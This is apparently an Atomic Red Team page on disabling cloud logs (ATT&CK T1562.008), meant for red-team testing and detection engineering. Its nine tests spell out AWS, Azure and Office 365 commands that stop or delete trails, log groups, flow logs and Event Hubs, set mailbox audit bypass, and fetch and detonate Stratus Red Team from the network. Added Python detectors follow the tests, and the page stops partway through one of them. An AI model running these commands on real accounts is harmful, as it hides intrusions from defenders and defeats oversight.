T1562.008
Impair Defenses: Disable Cloud Logs
Description from ATT&CK
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the Set-MailboxAuditBypassAssociation cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)
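The trail settings named in the description (logging state, multi-region coverage, log file validation, KMS encryption, SNS delivery topic) can be audited from the output of `aws cloudtrail describe-trails` and `aws cloudtrail get-trail-status`. The following Python is an added example, not part of the ATT&CK text or the Atomic Red Team project; the two trail records and their status are constructed samples, the account id, KMS key ARN and SNS topic ARN are placeholders, and `<KEY_ARN>` / `<TOPIC>` in the remediation strings must be filled in by the operator.

```python
"""Audit CloudTrail trail configuration for the weakenings described above.

Added example, not part of the Atomic Red Team page or the ATT&CK text. It
consumes the JSON shapes returned by `aws cloudtrail describe-trails`
(trailList) and `aws cloudtrail get-trail-status` (IsLogging); the records
below are constructed samples so the check runs offline.
"""
import json

# Constructed sample output of `aws cloudtrail describe-trails`:
# one healthy trail and one that has been weakened the way the text describes.
DESCRIBE_TRAILS = json.loads("""
{
  "trailList": [
    {
      "Name": "org-trail",
      "S3BucketName": "org-audit-logs",
      "IsMultiRegionTrail": true,
      "LogFileValidationEnabled": true,
      "KmsKeyId": "arn:aws:kms:us-east-1:111122223333:key/EXAMPLE-KEY-ID",
      "SnsTopicARN": "arn:aws:sns:us-east-1:111122223333:trail-delivery",
      "HomeRegion": "us-east-1"
    },
    {
      "Name": "redatomictesttrail",
      "S3BucketName": "redatomic-test",
      "IsMultiRegionTrail": false,
      "LogFileValidationEnabled": false,
      "HomeRegion": "us-east-1"
    }
  ]
}
""")

# Constructed sample output of `aws cloudtrail get-trail-status --name <trail>`,
# keyed by trail name.
TRAIL_STATUS = {
    "org-trail": {"IsLogging": True},
    "redatomictesttrail": {"IsLogging": False},
}

# Each check: (finding code, predicate over (trail, status), CLI call that reverses it).
# <KEY_ARN> and <TOPIC> are placeholders for the operator to fill in.
CHECKS = [
    ("NOT_LOGGING",
     lambda t, s: not s.get("IsLogging", False),
     "aws cloudtrail start-logging --name {name}"),
    ("SINGLE_REGION",
     lambda t, s: not t.get("IsMultiRegionTrail", False),
     "aws cloudtrail update-trail --name {name} --is-multi-region-trail"),
    ("NO_LOG_FILE_VALIDATION",
     lambda t, s: not t.get("LogFileValidationEnabled", False),
     "aws cloudtrail update-trail --name {name} --enable-log-file-validation"),
    ("NO_KMS_ENCRYPTION",
     lambda t, s: not t.get("KmsKeyId"),
     "aws cloudtrail update-trail --name {name} --kms-key-id <KEY_ARN>"),
    ("NO_SNS_TOPIC",
     lambda t, s: not t.get("SnsTopicARN"),
     "aws cloudtrail update-trail --name {name} --sns-topic-name <TOPIC>"),
]


def audit_trail(trail, status):
    """Return the finding codes for one trail, in CHECKS order."""
    return [code for code, failed, _ in CHECKS if failed(trail, status)]


def remediation(trail_name, findings):
    """Map each finding to the CLI call that restores the setting."""
    fixes = {code: cmd for code, _, cmd in CHECKS}
    return [fixes[f].format(name=trail_name) for f in findings]


def audit_account(describe_trails, trail_status):
    """Audit every trail in the account; returns {trail name: [finding codes]}."""
    report = {}
    for trail in describe_trails["trailList"]:
        status = trail_status.get(trail["Name"], {})
        report[trail["Name"]] = audit_trail(trail, status)
    return report


if __name__ == "__main__":
    for name, findings in audit_account(DESCRIBE_TRAILS, TRAIL_STATUS).items():
        print(f"{name}: {findings or 'OK'}")
        for cmd in remediation(name, findings):
            print(f"  fix: {cmd}")
```

Run against live output, the two JSON documents come from the CLI calls named in the docstring; a trail that passes every check still needs the event-level monitoring shown later on the page, because a permitted `update-trail` can undo any of these settings in one call.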
Atomic Tests
Atomic Test #1 - AWS - CloudTrail Changes
Creates a new CloudTrail trail in AWS. Upon successful creation it updates, stops and deletes the trail.
Supported Platforms: iaas:aws
auto_generated_guid: 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
cloudtrail_name | Name of the cloudTrail | string | redatomictesttrail |
s3_bucket_name | Name of the bucket | string | redatomic-test |
region | Name of the region | string | us-east-1 |
Attack Commands: Run with sh!
aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region}
aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
Cleanup Commands:
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
terraform destroy -auto-approve
Dependencies: Run with sh!
Description: Check if the ~/.aws/credentials file has a default stanza configured
Check Prereq Commands:
cat ~/.aws/credentials | grep "default"
Get Prereq Commands:
echo Please install the aws-cli and configure your AWS default profile using: aws configure
Description: Check if terraform is installed.
Check Prereq Commands:
terraform version
Get Prereq Commands:
echo Please install terraform and configure your AWS default profile
Description: Check if the dependency resources are already present.
Check Prereq Commands:
if [ -f "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/terraform.tfstate" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
terraform init
terraform apply -auto-approve
Atomic Test #2 - Azure - Eventhub Deletion
Deletes an Event Hub in Azure. An Event Hub is an event processing service that ingests and processes large volumes of events and data. An adversary may delete an Event Hub in an attempt to evade detection. https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about.
Supported Platforms: iaas:azure
auto_generated_guid: 5e09bed0-7d33-453b-9bf3-caea32bff719
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
username | Azure username | string | None |
password | Azure password | string | None |
event_hub_name | Name of the eventhub | string | test_eventhub |
resource_group | Name of the resource group | string | None |
name_space_name | Name of the NameSpace | string | None |
Attack Commands: Run with powershell!
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
# Remove-AzEventHub needs an Az context; Connect-AzureAD does not provide one.
Connect-AzAccount -Credential $creds
Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}
Cleanup Commands:
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
terraform destroy -auto-approve
Dependencies: Run with powershell!
Description: Az PowerShell module must be installed (Remove-AzEventHub is part of Az.EventHub)
Check Prereq Commands:
try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
Get Prereq Commands:
Install-Module -Name Az -Force
Description: Check if terraform is installed.
Check Prereq Commands:
terraform version
Get Prereq Commands:
echo Please install terraform.
Description: Check if the user is logged into Azure.
Check Prereq Commands:
az account show
Get Prereq Commands:
echo Configure your Azure account using: az login.
Description: Create dependency resources using terraform
Check Prereq Commands:
try {if (Test-Path "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1}
Get Prereq Commands:
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
terraform init
terraform apply -auto-approve
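The deletion performed by Test #2 leaves a record in the Azure Activity Log, which is where a defender would catch it. The Python below is an added example, not part of the Atomic Red Team project. Its entries are constructed in the shape returned by `az monitor activity-log list -o json` (`operationName.value`, `status.value`, `caller`, `resourceId`, `correlationId`); the subscription id, caller and resource names are placeholders. It also watches namespace and diagnostic-setting deletions, which are not on the page but remove a log destination in the same way.

```python
"""Flag Event Hub and related log-pipeline deletions in the Azure Activity Log
(Test #2 above).

Added example, not from the Atomic Red Team project. Entries are constructed
in the shape `az monitor activity-log list -o json` returns (operationName.value,
status.value, caller, resourceId, correlationId); subscription id, caller and
resource names are placeholders.
"""

# Resource-provider operations whose success removes a log destination.
WATCHED_OPERATIONS = {
    "microsoft.eventhub/namespaces/eventhubs/delete": "event-hub-deleted",
    "microsoft.eventhub/namespaces/delete": "event-hub-namespace-deleted",
    "microsoft.insights/diagnosticsettings/delete": "diagnostic-setting-deleted",
}
# The Activity Log emits a "Started" record and then a terminal one for the
# same correlationId; alert once, on the terminal record.
TERMINAL_STATUSES = {"Succeeded", "Failed"}


def evaluate(entry):
    """Return a finding for one terminal Activity Log entry, or None."""
    operation = (entry.get("operationName") or {}).get("value", "").lower()
    rule = WATCHED_OPERATIONS.get(operation)
    status = (entry.get("status") or {}).get("value", "")
    if rule is None or status not in TERMINAL_STATUSES:
        return None
    resource_id = entry.get("resourceId", "")
    return {
        "rule": rule,
        "actor": entry.get("caller", "unknown"),
        "target": resource_id.rsplit("/", 1)[-1] or resource_id,
        "succeeded": status == "Succeeded",  # a Failed delete is still an attempt
        "correlation_id": entry.get("correlationId"),
    }


def scan(entries):
    """Evaluate a batch of entries and keep only the findings."""
    return [f for f in map(evaluate, entries) if f]


RG = "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/atomic-rg"  # placeholder
NS = RG + "/providers/Microsoft.EventHub/namespaces/atomic-ns"
SAMPLE_ENTRIES = [  # constructed
    {"operationName": {"value": "Microsoft.EventHub/namespaces/eventhubs/delete"},
     "status": {"value": "Started"}, "caller": "admin@contoso.example",
     "correlationId": "c1", "resourceId": NS + "/eventhubs/test_eventhub"},
    {"operationName": {"value": "Microsoft.EventHub/namespaces/eventhubs/delete"},
     "status": {"value": "Succeeded"}, "caller": "admin@contoso.example",
     "correlationId": "c1", "resourceId": NS + "/eventhubs/test_eventhub"},
    {"operationName": {"value": "Microsoft.Insights/diagnosticSettings/delete"},
     "status": {"value": "Failed"}, "caller": "svc@contoso.example", "correlationId": "c2",
     "resourceId": RG + "/providers/Microsoft.KeyVault/vaults/atomic-kv"
                   "/providers/microsoft.insights/diagnosticSettings/to-eventhub"},
    {"operationName": {"value": "Microsoft.EventHub/namespaces/eventhubs/write"},
     "status": {"value": "Succeeded"}, "caller": "admin@contoso.example",
     "correlationId": "c3", "resourceId": NS + "/eventhubs/test_eventhub"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_ENTRIES):
        print(finding)
```

Because the Activity Log itself is the signal here, the defender's mitigation is to export it to a destination the deleted Event Hub does not feed (a second subscription or a storage account with a resource lock), so the deletion record survives the deletion.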
Atomic Test #3 - Office 365 - Exchange Audit Log Disabled
You can use the Exchange Management Shell to enable or disable mailbox audit logging for a mailbox. This test disables unified audit log ingestion via the Exchange Online PowerShell cmdlet Set-AdminAuditLogConfig. https://github.com/Azure/Azure-Sentinel/blob/master/Detections/OfficeActivity/exchange_auditlogdisabled.yaml
Supported Platforms: office-365
auto_generated_guid: 1ee572f3-056c-4632-a7fc-7e7c42b1543c
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
username | office-365 username | string | None |
password | office-365 password | string | None |
Attack Commands: Run with powershell!
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $False
Cleanup Commands:
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $True
Dependencies: Run with powershell!
Description: ExchangeOnlineManagement PowerShell module must be installed
Check Prereq Commands:
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
Get Prereq Commands:
Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement
Atomic Test #4 - AWS - Disable CloudTrail Logging Through Event Selectors using Stratus
Updates event selectors in AWS CloudTrail to disable the logging of certain management events and evade defenses. This Atomic test leverages Stratus Red Team, a tool built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary that detonates offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-event-selectors/
Supported Platforms: linux,macos,iaas:aws
auto_generated_guid: a27418de-bdce-4ebd-b655-38f11142bf0c
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1562.008/src |
aws_region | AWS region to detonate | string | us-west-2 |
Attack Commands: Run with sh!
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-event-selectors
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-event-selectors --force
Cleanup Commands:
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*
Dependencies: Run with sh!
Description: Stratus binary must be present at #{stratus_path}/stratus
Check Prereq Commands:
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
# POSIX sh has no "==" inside [ ]; use "=" so this works under sh as declared.
if [ "$(uname)" = "Darwin" ]; then
  DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4)
  wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" = "Linux" ]; then
  DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4)
  wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi
Description: Check if the ~/.aws/credentials file has a default stanza configured
Check Prereq Commands:
cat ~/.aws/credentials | grep "default"
Get Prereq Commands:
echo Please install the aws-cli and configure your AWS default profile using: aws configure
Atomic Test #5 - AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus
This Atomic test uses Stratus Red Team to first set up a CloudTrail trail logging into an S3 bucket, then make an API call that updates the lifecycle rule on that bucket with an expiration of 1 day, effectively deleting all logs after one day. Adversaries use this activity to evade detection. Stratus Red Team is a self-contained binary that detonates offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
Supported Platforms: linux,macos,iaas:aws
auto_generated_guid: 22d89a2f-d475-4895-b2d4-68626d49c029
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1562.008/src |
aws_region | AWS region to detonate | string | us-west-2 |
Attack Commands: Run with sh!
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-lifecycle-rule
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-lifecycle-rule --force
Cleanup Commands:
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*
Dependencies: Run with sh!
Description: Stratus binary must be present at #{stratus_path}/stratus
Check Prereq Commands:
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
# POSIX sh has no "==" inside [ ]; use "=" so this works under sh as declared.
if [ "$(uname)" = "Darwin" ]; then
  DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4)
  wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" = "Linux" ]; then
  DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4)
  wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi
Description: Check if the ~/.aws/credentials file has a default stanza configured
Check Prereq Commands:
cat ~/.aws/credentials | grep "default"
Get Prereq Commands:
echo Please install the aws-cli and configure your AWS default profile using: aws configure
Atomic Test #6 - AWS - Remove VPC Flow Logs using Stratus
This Atomic attempts to remove the AWS VPC Flow Logs configuration. Stratus Red Team is a self-contained binary that detonates offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.vpc-remove-flow-logs/
Supported Platforms: linux,macos,iaas:aws
auto_generated_guid: 93c150f5-ad7b-4ee3-8992-df06dec2ac79
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1562.008/src |
aws_region | AWS region to detonate | string | us-west-2 |
Attack Commands: Run with sh!
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.vpc-remove-flow-logs
echo "starting detonate"
./stratus detonate aws.defense-evasion.vpc-remove-flow-logs --force
Cleanup Commands:
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*
Dependencies: Run with sh!
Description: Stratus binary must be present at #{stratus_path}/stratus
Check Prereq Commands:
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
# POSIX sh has no "==" inside [ ]; use "=" so this works under sh as declared.
if [ "$(uname)" = "Darwin" ]; then
  DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4)
  wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" = "Linux" ]; then
  DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4)
  wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi
Description: Check if the ~/.aws/credentials file has a default stanza configured
Check Prereq Commands:
cat ~/.aws/credentials | grep "default"
Get Prereq Commands:
echo Please install the aws-cli and configure your AWS default profile using: aws configure
Atomic Test #7 - AWS - CloudWatch Log Group Deletes
Creates a new CloudWatch log group in AWS. Upon successful creation it deletes the group. Attackers can use this technique to evade defenses by deleting the log group: once it is deleted, activity that would have been written to it is no longer logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion
Supported Platforms: iaas:aws
auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
cloudwatch_log_group_name | Name of the cloudWatch log group | string | log-test |
region | Name of the region | string | us-east-1 |
Attack Commands: Run with sh!
aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Created ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"
Dependencies: Run with sh!
Description: Check if the ~/.aws/credentials file has a default stanza configured
Check Prereq Commands:
cat ~/.aws/credentials | grep "default"
Get Prereq Commands:
echo Please install the aws-cli and configure your AWS default profile using: aws configure
Atomic Test #8 - AWS CloudWatch Log Stream Deletes
Creates a new CloudWatch log stream in AWS. Upon successful creation it deletes the stream. Attackers can use this technique to evade defenses by deleting the log stream: once it is deleted, activity that would have been written to it is no longer logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html
Supported Platforms: iaas:aws
auto_generated_guid: 33ca84bc-4259-4943-bd36-4655dc420932
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
cloudwatch_log_group_name | Name of the cloudWatch log group | string | test-logs |
cloudwatch_log_stream_name | Name of the cloudWatch log stream | string | 20150601 |
region | Name of the region | string | us-west-2 |
Attack Commands: Run with sh!
aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Created ***"
# Pass --region on the stream calls too, so they hit the same region as the group.
aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
echo "*** Log Stream Created ***"
aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
echo "*** Log Stream Deleted ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"
Dependencies: Run with sh!
Description: Check if the ~/.aws/credentials file has a default stanza configured
Check Prereq Commands:
cat ~/.aws/credentials | grep "default"
Get Prereq Commands:
echo Please install the aws-cli and configure your AWS default profile using: aws configure
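Every AWS test above (Tests #1 and #4 to #8) is a management API call, and each one lands in CloudTrail itself before the tampering takes effect: `UpdateTrail`, `StopLogging`, `DeleteTrail`, `PutEventSelectors`, `PutBucketLifecycle`, `DeleteFlowLogs`, `DeleteLogGroup` and `DeleteLogStream`. The Python below is an added example, not part of the Atomic Red Team project or Stratus Red Team. The events are constructed samples in the CloudTrail record shape (`eventSource`, `eventName`, `awsRegion`, `userIdentity.arn`, `requestParameters`, optional `errorCode`); the account id and IAM principal are placeholders, and `LOG_BUCKETS` stands in for the set of trail destination buckets that a deployment would read from `aws cloudtrail describe-trails`. The lifecycle check goes beyond the page's one-day case and flags any enabled expiration shorter than a configurable threshold.

```python
"""Flag CloudTrail management events matching AWS Tests #1 and #4 to #8 above.

Added example, not from the Atomic Red Team project. Events are constructed
samples in the CloudTrail record shape (eventSource, eventName, awsRegion,
userIdentity.arn, requestParameters, optional errorCode); the account id and
principal are placeholders, and LOG_BUCKETS stands in for the trail buckets a
deployment would read from `aws cloudtrail describe-trails`.
"""

# Calls whose occurrence alone disables or destroys a logging path.
DIRECT_HITS = {
    ("cloudtrail.amazonaws.com", "StopLogging"): "trail-stopped",
    ("cloudtrail.amazonaws.com", "DeleteTrail"): "trail-deleted",
    ("logs.amazonaws.com", "DeleteLogGroup"): "cloudwatch-log-group-deleted",
    ("logs.amazonaws.com", "DeleteLogStream"): "cloudwatch-log-stream-deleted",
    ("ec2.amazonaws.com", "DeleteFlowLogs"): "vpc-flow-logs-deleted",
}
LOG_BUCKETS = {"redatomic-test", "org-audit-logs"}  # constructed
MAX_LIFECYCLE_DAYS = 365  # expiring trail logs sooner than this is suspicious


def check_update_trail(params):
    """UpdateTrail that switches off multi-region coverage or file validation."""
    if params.get("isMultiRegionTrail") is False:
        return "trail-multi-region-disabled"
    if params.get("enableLogFileValidation") is False:
        return "trail-log-validation-disabled"
    return None


def check_event_selectors(params):
    """PutEventSelectors that stops recording management or write events."""
    for selector in params.get("eventSelectors", []):
        if selector.get("includeManagementEvents") is False:
            return "trail-management-events-excluded"
        if selector.get("readWriteType") == "ReadOnly":
            return "trail-write-events-excluded"
    return None


def check_lifecycle(params, log_buckets):
    """PutBucketLifecycle on a log bucket with a short expiration (Test #5)."""
    if params.get("bucketName") not in log_buckets:
        return None
    rules = params.get("LifecycleConfiguration", {}).get("Rule", [])
    if isinstance(rules, dict):  # a lone rule is serialised as one object
        rules = [rules]
    for rule in rules:
        days = rule.get("Expiration", {}).get("Days")
        if rule.get("Status") == "Enabled" and days is not None and days < MAX_LIFECYCLE_DAYS:
            return "trail-log-bucket-short-expiration"
    return None


def evaluate(event, log_buckets=LOG_BUCKETS):
    """Return a finding for one CloudTrail event, or None if it is benign."""
    key = (event.get("eventSource"), event.get("eventName"))
    params = event.get("requestParameters") or {}
    if key in DIRECT_HITS:
        rule = DIRECT_HITS[key]
    elif key == ("cloudtrail.amazonaws.com", "UpdateTrail"):
        rule = check_update_trail(params)
    elif key == ("cloudtrail.amazonaws.com", "PutEventSelectors"):
        rule = check_event_selectors(params)
    elif key == ("s3.amazonaws.com", "PutBucketLifecycle"):
        rule = check_lifecycle(params, log_buckets)
    else:
        rule = None
    if rule is None:
        return None
    return {
        "rule": rule,
        "actor": event.get("userIdentity", {}).get("arn", "unknown"),
        "succeeded": "errorCode" not in event,  # a denied attempt still deserves an alert
    }


def scan(events, log_buckets=LOG_BUCKETS):
    """Evaluate a batch of events and keep only the findings."""
    return [f for f in (evaluate(e, log_buckets) for e in events) if f]


ACTOR = {"arn": "arn:aws:iam::111122223333:user/redatomic"}  # placeholder principal
SAMPLE_EVENTS = [  # constructed
    {"eventSource": "cloudtrail.amazonaws.com", "eventName": "UpdateTrail", "awsRegion": "us-east-1",
     "userIdentity": ACTOR, "requestParameters": {"name": "redatomictesttrail", "isMultiRegionTrail": True}},
    {"eventSource": "cloudtrail.amazonaws.com", "eventName": "StopLogging", "awsRegion": "us-east-1",
     "userIdentity": ACTOR, "requestParameters": {"name": "redatomictesttrail"}},
    {"eventSource": "cloudtrail.amazonaws.com", "eventName": "PutEventSelectors", "awsRegion": "us-west-2",
     "userIdentity": ACTOR, "requestParameters": {"trailName": "redatomictesttrail",
     "eventSelectors": [{"readWriteType": "ReadOnly", "includeManagementEvents": False}]}},
    {"eventSource": "s3.amazonaws.com", "eventName": "PutBucketLifecycle", "awsRegion": "us-west-2",
     "userIdentity": ACTOR, "requestParameters": {"bucketName": "redatomic-test",
     "LifecycleConfiguration": {"Rule": {"ID": "expire", "Status": "Enabled", "Expiration": {"Days": 1}}}}},
    {"eventSource": "logs.amazonaws.com", "eventName": "DeleteLogGroup", "awsRegion": "us-east-1",
     "userIdentity": ACTOR, "requestParameters": {"logGroupName": "log-test"}, "errorCode": "AccessDenied"},
    {"eventSource": "logs.amazonaws.com", "eventName": "CreateLogGroup", "awsRegion": "us-east-1",
     "userIdentity": ACTOR, "requestParameters": {"logGroupName": "log-test"}},
]
```

The first sample (an `UpdateTrail` that keeps multi-region enabled) and the last (`CreateLogGroup`) are benign controls; the `DeleteLogGroup` carries an `errorCode` to show that a refused call is reported with `succeeded: False` rather than dropped. Since the attacker's goal is to stop this very log, the findings only help if the trail delivers to a bucket the tampering principal cannot write to, which is why an organization trail in a separate account is the usual mitigation.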
Atomic Test #9 - Office 365 - Set Audit Bypass For a Mailbox
Uses the Exchange Management Shell to set an audit bypass association for a mailbox. This prevents any mailbox audit log entries from being generated for the target mailbox. https://learn.microsoft.com/en-us/powershell/module/exchange/set-mailboxauditbypassassociation?view=exchange-ps
Supported Platforms: office-365
auto_generated_guid: c9a2f6fe-7197-488c-af6d-10c782121ca6
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
username | office-365 username | string | o365_user_test |
password | office-365 password | string | o365_password_test |
target_email | office-365 target_email | string | o365_email_test |
Attack Commands: Run with powershell!
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-MailboxAuditBypassAssociation -Identity "#{target_email}" -AuditBypassEnabled $true
Cleanup Commands:
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-MailboxAuditBypassAssociation -Identity "#{target_email}" -AuditBypassEnabled $false
Disconnect-ExchangeOnline -Confirm:$false
Dependencies: Run with powershell!
Description: ExchangeOnlineManagement PowerShell module must be installed
Check Prereq Commands:
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
Get Prereq Commands:
Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement
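Both Office 365 tests (Test #3, `Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $False`, and Test #9, `Set-MailboxAuditBypassAssociation -AuditBypassEnabled $true`) are themselves recorded as Exchange admin audit records in the Unified Audit Log, which is how the Sentinel rule linked from Test #3 catches them. The Python below is an added example, not part of the Atomic Red Team project. Its records are constructed in the Office 365 Management Activity API shape (`Operation`, `UserId`, `ObjectId`, `Parameters` as a list of `Name`/`Value` pairs); the contoso.example addresses are placeholders. It also covers `Set-Mailbox -AuditEnabled $false`, the per-mailbox switch the page's Test #3 description alludes to but does not name.

```python
"""Detect the Exchange Online audit-tampering cmdlets from Tests #3 and #9 in
Office 365 Unified Audit Log records.

Added example, not from the Atomic Red Team project. Records are constructed
in the Management Activity API shape (Operation, UserId, ObjectId, Parameters
as a list of Name/Value pairs); contoso.example addresses are placeholders.
Set-Mailbox -AuditEnabled is included as a related cmdlet the page does not
list.
"""


def parameters(record):
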